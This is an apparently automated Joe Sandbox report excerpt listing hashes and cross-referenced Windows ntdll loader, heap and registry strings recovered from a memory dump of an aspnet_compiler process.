                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-523794902
                                                                                                        • Opcode ID: 876d8a79d6d62ef5cfcd73a4ce1d1e18b58a451855f809131a5f0edc42747c4a
                                                                                                        • Instruction ID: 22ea8079b2c4699a1329f442c47174f553baeadabaebd2ccaf6478aa88c68be9
                                                                                                        • Opcode Fuzzy Hash: 876d8a79d6d62ef5cfcd73a4ce1d1e18b58a451855f809131a5f0edc42747c4a
                                                                                                        • Instruction Fuzzy Hash: 5C42F275A093429FD72ECF28C484B6ABBE5FF88604F044A6DF4858B382D775D846CB52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                        • API String ID: 0-122214566
                                                                                                        • Opcode ID: f4b3a09b5045f7e5e76bad788f45cca4d996453b7f56050042cb4deaf452a2a3
                                                                                                        • Instruction ID: 0951ea6ce48fbb4d8d1a065013b9c760d131114a821d8939fe0c1428d4de0e09
                                                                                                        • Opcode Fuzzy Hash: f4b3a09b5045f7e5e76bad788f45cca4d996453b7f56050042cb4deaf452a2a3
                                                                                                        • Instruction Fuzzy Hash: B8C18B31A082269BDB2C8F68C884BBEBBB5BF45314F144169ED02DB391E7B4DD54C395
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-792281065
                                                                                                        • Opcode ID: b93df9ba80f56e787e61b22e5f0ceed70c91f3edf4c339c19c365edfe7a7fb02
                                                                                                        • Instruction ID: 5736c612b12f6784a95e1f1b169dd99c94f9173704258c238a15a7b3d9634c03
                                                                                                        • Opcode Fuzzy Hash: b93df9ba80f56e787e61b22e5f0ceed70c91f3edf4c339c19c365edfe7a7fb02
                                                                                                        • Instruction Fuzzy Hash: F0912C30B00316DBEB2EEF58E849BAA7BA1BF51F1CF04411DD5106BA82DB749841CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                        • API String ID: 0-1745908468
                                                                                                        • Opcode ID: 8c626f1444718658640949b62871ba2ecba8124b664c31a4a59df7d95d17a015
                                                                                                        • Instruction ID: 5e08a2590d180e6d797200741dc8f8413ad6cceea8edab901e0ad86781633905
                                                                                                        • Opcode Fuzzy Hash: 8c626f1444718658640949b62871ba2ecba8124b664c31a4a59df7d95d17a015
                                                                                                        • Instruction Fuzzy Hash: 4A914435900642DFDB1EDF68C884AEDBBF2FF59708F04805DE545AB2A2C7759942CB14
                                                                                                        Strings
                                                                                                        • apphelp.dll, xrefs: 01106496
                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01169A2A
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01169A11, 01169A3A
                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01169A01
                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011699ED
                                                                                                        • LdrpInitShimEngine, xrefs: 011699F4, 01169A07, 01169A30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-204845295
                                                                                                        • Opcode ID: 159c9aeeb034274b5246c7db10aced546df915947e8b4d4714e9c4deb8b9379c
                                                                                                        • Instruction ID: 9a03d47a78dcb0439fdb42254ccd00f47f450a934b7214ba92c4ccbadcf9778e
                                                                                                        • Opcode Fuzzy Hash: 159c9aeeb034274b5246c7db10aced546df915947e8b4d4714e9c4deb8b9379c
                                                                                                        • Instruction Fuzzy Hash: F15100716083049FE72EDF24D845BAB77E8FB84648F00091EF5859B1A1E771E914CB92
                                                                                                        Strings
                                                                                                        • RTL: Re-Waiting, xrefs: 0118031E
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011802E7
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011802BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: 0510b12f5fbb482eaa2a0ab795006e96ade95b4b9e5e098fcbf25be59af009da
                                                                                                        • Instruction ID: 72c791cef63d21f8b8028aaa83937401a4c40e366569862693f25b96a7e3b515
                                                                                                        • Opcode Fuzzy Hash: 0510b12f5fbb482eaa2a0ab795006e96ade95b4b9e5e098fcbf25be59af009da
                                                                                                        • Instruction Fuzzy Hash: FFE19E70A087469FD72DDF28C884B2ABBE1BB88314F144A5DF5A58B2E1D774D845CB43
                                                                                                        Strings
                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 0113527B
                                                                                                        • WindowsExcludedProcs, xrefs: 0113522A
                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 01135352
                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 0113542B
                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 01135247
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                        • API String ID: 0-258546922
                                                                                                        • Opcode ID: 2f583d8b4d812e90c861f7085b342962729b9ae0aa71c60bb6fd4ed8dac679a0
                                                                                                        • Instruction ID: 3390ccf0e39c050c45230f97d0a94d7cab0f76a5a0e0c93764d8d1f34f5faef6
                                                                                                        • Opcode Fuzzy Hash: 2f583d8b4d812e90c861f7085b342962729b9ae0aa71c60bb6fd4ed8dac679a0
                                                                                                        • Instruction Fuzzy Hash: 6DF16E72D10229EFCB5ADFA9C9809EEBBF9FF48A54F11405AE501E7210E7749E01CB90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                        • API String ID: 0-3178619729
                                                                                                        • Opcode ID: efa2d6c5a01509fd1714937f9d94f2b162c5f879f57084914123f3e0785d1fc5
                                                                                                        • Instruction ID: 8b1c3aad8cb3503779acb281ec9d9aa73da15a41bed0072cebb384a331f6c291
                                                                                                        • Opcode Fuzzy Hash: efa2d6c5a01509fd1714937f9d94f2b162c5f879f57084914123f3e0785d1fc5
                                                                                                        • Instruction Fuzzy Hash: 2313C070A00666CFDB2DCF68C4907AABBF1FF59304F1481A9D949AB382D734A855CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-3570731704
                                                                                                        • Opcode ID: 0856dfe96532a49a8c95ce588c53c3ba65d86370ecaeb2f52ebe36c2dad2c1f1
                                                                                                        • Instruction ID: 4a5dd9be2ead6d0baa571dfbb796e8524809c5c36e012a12d47dd8077e22b22f
                                                                                                        • Opcode Fuzzy Hash: 0856dfe96532a49a8c95ce588c53c3ba65d86370ecaeb2f52ebe36c2dad2c1f1
                                                                                                        • Instruction Fuzzy Hash: 6F926C71A00269DFEB69CF28CC40BA9B7B6BF45314F1581EAE949A7381D7709E80CF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                        • API String ID: 0-379654539
                                                                                                        • Opcode ID: ac2841516501b941bcc4dfc0367ee7a7388129912e0f0db35fd747d11b876abf
                                                                                                        • Instruction ID: 725c69ebf63d8a4b36e3865ec912949617682f3dab777b4525cc2d0a6423359e
                                                                                                        • Opcode Fuzzy Hash: ac2841516501b941bcc4dfc0367ee7a7388129912e0f0db35fd747d11b876abf
                                                                                                        • Instruction Fuzzy Hash: 6FC18870109382CFD719CF58D040B6ABBF4BF84708F04886AF9958B659E738DA4ACB53
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01148421
                                                                                                        • LdrpInitializeProcess, xrefs: 01148422
                                                                                                        • @, xrefs: 01148591
                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0114855E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1918872054
                                                                                                        • Opcode ID: 0c7ea7baeedd8e7656fceb51676a191d1e5b07711d1d94b7c90edfc17e6d7410
                                                                                                        • Instruction ID: ee7a41e231f919c565cda3252f3f80b8136acbae334d1217a3af1c0733849784
                                                                                                        • Opcode Fuzzy Hash: 0c7ea7baeedd8e7656fceb51676a191d1e5b07711d1d94b7c90edfc17e6d7410
                                                                                                        • Instruction Fuzzy Hash: 29917C71508345EFD729EF65C840FABBAE8FB84B58F44492EFA8496151E334D904CBA2
                                                                                                        Strings
                                                                                                        • MZER, xrefs: 011316E8
                                                                                                        • LdrpCompleteMapModule, xrefs: 0117A590
                                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 0117A59A
                                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 0117A589
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
                                                                                                        • API String ID: 0-1409021520
                                                                                                        • Opcode ID: 40bb770ca7de1e730e850135df080a4e4e6b05569229170d5b309e2b0eee8fcc
                                                                                                        • Instruction ID: ed4ec319b6d375cb8047d5b5734fe941826653fc720ed33413a64c69245db9e8
                                                                                                        • Opcode Fuzzy Hash: 40bb770ca7de1e730e850135df080a4e4e6b05569229170d5b309e2b0eee8fcc
                                                                                                        • Instruction Fuzzy Hash: 905125B0600745EBEB2ECB9CC944B1A7BF4BF80724F190158EA519B7E6D7B4E840C741
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                        • API String ID: 0-336120773
                                                                                                        • Opcode ID: 2dfa262ea7e5a46730f11f25661fc87fe92c13672a2ee02f8d0661eb7a138177
                                                                                                        • Instruction ID: 6b3875ac1abed5323bf1f8b1f49a4923e3fd2564a733498f9662c1cdca06e539
                                                                                                        • Opcode Fuzzy Hash: 2dfa262ea7e5a46730f11f25661fc87fe92c13672a2ee02f8d0661eb7a138177
                                                                                                        • Instruction Fuzzy Hash: C53146B9680101FFD719DB99C884F66B7EAFF15A68F24001DF541CB292E770EC40CA55
                                                                                                        Strings
                                                                                                        • apphelp.dll, xrefs: 01132462
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0117A9A2
                                                                                                        • LdrpDynamicShimModule, xrefs: 0117A998
                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0117A992
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-176724104
                                                                                                        • Opcode ID: 8001b49b0beacc2f34832c859fe80033a453b4db764aee9dc8e4549835b1e87e
                                                                                                        • Instruction ID: 0c8d5a04295403a6764cbb3e67ed2feb7f85dccd5711946cc94ca9f2ca09e767
                                                                                                        • Opcode Fuzzy Hash: 8001b49b0beacc2f34832c859fe80033a453b4db764aee9dc8e4549835b1e87e
                                                                                                        • Instruction Fuzzy Hash: 6A312C71600201EFDB3EEF5DB849A6EBBB4FF84714F1A0159E90167356D7B05991CB80
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                        • API String ID: 0-1391187441
                                                                                                        • Opcode ID: aae039df3cdcc597279b485e446d9c14e985392ead646d5c7adca90189fc61b3
                                                                                                        • Instruction ID: 58da621662d060908bd676f2baf5f8283fc544e9389a89e97a1a639a991a612c
                                                                                                        • Opcode Fuzzy Hash: aae039df3cdcc597279b485e446d9c14e985392ead646d5c7adca90189fc61b3
                                                                                                        • Instruction Fuzzy Hash: AA31E336B00109EFC70ADB49CC88FAEB7F9EF45738F154059E914AB291D7B0E940CA64
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                        • API String ID: 0-2779062949
                                                                                                        • Opcode ID: 7355f35b5386a2abd5dab1da9c90404037726c291638b82e3b717ec4f6addc78
                                                                                                        • Instruction ID: 4cb80959cf49f14e411c0ad01f319ebce5b826b4b04c8fe7f3b45c2e8a1e49bb
                                                                                                        • Opcode Fuzzy Hash: 7355f35b5386a2abd5dab1da9c90404037726c291638b82e3b717ec4f6addc78
                                                                                                        • Instruction Fuzzy Hash: 43A16E72D112299BDB35DF68CC88BEAB7B8EF48714F1041E9E908A7250D7359E84CF90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                        • API String ID: 0-3870751728
                                                                                                        • Opcode ID: 9f52ad28edf530377d87777391e6c0aa9e9ee368d654c7ccba209ccb34c1bc5e
                                                                                                        • Instruction ID: cdba43e33c5881970a2bd3610e9098a36d02c6baa7806a2f53648289b516863f
                                                                                                        • Opcode Fuzzy Hash: 9f52ad28edf530377d87777391e6c0aa9e9ee368d654c7ccba209ccb34c1bc5e
                                                                                                        • Instruction Fuzzy Hash: 02913BB0E102199FEB58CF69C480BADBBF1BF48314F14C16AE915AB391E7759842CF94
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                        • API String ID: 0-373624363
                                                                                                        • Opcode ID: 084bd04c9c2868fbd621968a131f690775590bb6cae5ff7b1dd5d67ffab2e211
                                                                                                        • Instruction ID: 74f3449760166e1c512abade96e4c5d54c9cfb0b6bb6629c8e637fcba528e290
                                                                                                        • Opcode Fuzzy Hash: 084bd04c9c2868fbd621968a131f690775590bb6cae5ff7b1dd5d67ffab2e211
                                                                                                        • Instruction Fuzzy Hash: 4C91FF71A08619CFEB29CF58C440BEEFBB0FF14324F1585A5E911AB394D3789A40CB95
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %$&$@
                                                                                                        • API String ID: 0-1537733988
                                                                                                        • Opcode ID: eb9fbecbe451315e0f6f893a9725f2a660816e43e31fa04847fd36371ececc25
                                                                                                        • Instruction ID: 09aa634cabd7b3c1e45c8c0b9eceb4854dda8c8943b10e72fb4b1862bdbe2d15
                                                                                                        • Opcode Fuzzy Hash: eb9fbecbe451315e0f6f893a9725f2a660816e43e31fa04847fd36371ececc25
                                                                                                        • Instruction Fuzzy Hash: AB71AF7050834A9FC71DDF28C580A2BBBEAFF99A1CF108A1DE59A47251D731D905CF92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                        • API String ID: 0-1151232445
                                                                                                        • Opcode ID: 121a9f10cfcd31046e7591ffb64d58c55e5560c7cd6b21c130de9f9cada0c30f
                                                                                                        • Instruction ID: 7ce8649b3d89229e15db4c586b2214913d94e9da0d39ddfd18f3c222f9df1479
                                                                                                        • Opcode Fuzzy Hash: 121a9f10cfcd31046e7591ffb64d58c55e5560c7cd6b21c130de9f9cada0c30f
                                                                                                        • Instruction Fuzzy Hash: 69412770A002808FFF2FCA1DD8947B97BE4AF02304F1944A9D5869B2D6D7A6E455CB53
                                                                                                        Strings
                                                                                                        • @, xrefs: 011CC1F1
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011CC1C5
                                                                                                        • PreferredUILanguages, xrefs: 011CC212
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                        • API String ID: 0-2968386058
                                                                                                        • Opcode ID: 3a5c3420ed516fdb5e557743d5868ef94ef55adda775a689bb56625fcd3223f5
                                                                                                        • Instruction ID: 5968e77f969bd729c19ba52148d7abfa7ca0c2f7c4df4a13bb6f4ca0150bdc37
                                                                                                        • Opcode Fuzzy Hash: 3a5c3420ed516fdb5e557743d5868ef94ef55adda775a689bb56625fcd3223f5
                                                                                                        • Instruction Fuzzy Hash: 72416671E00219EBDF19DAD8C851FEEBBBAAB64B04F14406EE619F7240D7749E44CB90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                        • API String ID: 0-1373925480
                                                                                                        • Opcode ID: 2e91c6fd21cdac8e7832ffbefdc488bd7c7bdffddce2ee082891c6c61a0ace24
                                                                                                        • Instruction ID: ce28dfea1f7169ce614c80902e28afcff79eba97fe923f1f8c7a1cff1aec7090
                                                                                                        • Opcode Fuzzy Hash: 2e91c6fd21cdac8e7832ffbefdc488bd7c7bdffddce2ee082891c6c61a0ace24
                                                                                                        • Instruction Fuzzy Hash: 2C4126359003588BEB2DDBE8D840BACBFB4FF55354F58046AD911EBB82D7B4A901CB11
                                                                                                        Strings
                                                                                                        • RtlCreateActivationContext, xrefs: 011829F9
                                                                                                        • SXS: %s() passed the empty activation context data, xrefs: 011829FE
                                                                                                        • Actx , xrefs: 011433AC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                        • API String ID: 0-859632880
                                                                                                        • Opcode ID: f531e7ee257b22450e16c9926ac4d4cc86a38bc374d928e36eea68e39faf414e
                                                                                                        • Instruction ID: 281f8419d9b77730f033a9b26982b004d4caee39d0310b2c095849ec89aa6941
                                                                                                        • Opcode Fuzzy Hash: f531e7ee257b22450e16c9926ac4d4cc86a38bc374d928e36eea68e39faf414e
                                                                                                        • Instruction Fuzzy Hash: 603126366102259FEB2EEE68D884FD67BA4FF44B14F098429EE149F681C730D941CB90
                                                                                                        Strings
                                                                                                        • GlobalFlag, xrefs: 0119B68F
                                                                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0119B632
                                                                                                        • @, xrefs: 0119B670
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                        • API String ID: 0-4192008846
                                                                                                        • Opcode ID: f68c1b27a7c2c663acadabc3d3878d34103b2ff46cfcfe6dcc43dd6478e0e1c4
                                                                                                        • Instruction ID: b354db86da01c9b25aed7c2b5dfd89b5a68d985df13fda212b54be456edffe61
                                                                                                        • Opcode Fuzzy Hash: f68c1b27a7c2c663acadabc3d3878d34103b2ff46cfcfe6dcc43dd6478e0e1c4
                                                                                                        • Instruction Fuzzy Hash: 4E315CB1A0021AAFDF14EF95DC81EEFBB78EF44748F040469EA15A7140D774AA00CBA4
                                                                                                        Strings
                                                                                                        • BuildLabEx, xrefs: 0115130F
                                                                                                        • @, xrefs: 011512A5
                                                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0115127B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                        • API String ID: 0-3051831665
                                                                                                        • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                        • Instruction ID: 16d57fb5e47a0168f9b973e863076630ac46f9bbfe5ddc95205535046089d682
                                                                                                        • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                        • Instruction Fuzzy Hash: 8D31AF76900119FFDB5AAF95CC54FEEBBBDEB94764F004025EA24A7260D7309A05CB90
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01192104
                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 011920F3
                                                                                                        • LdrpInitializationFailure, xrefs: 011920FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_10e0000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2986994758
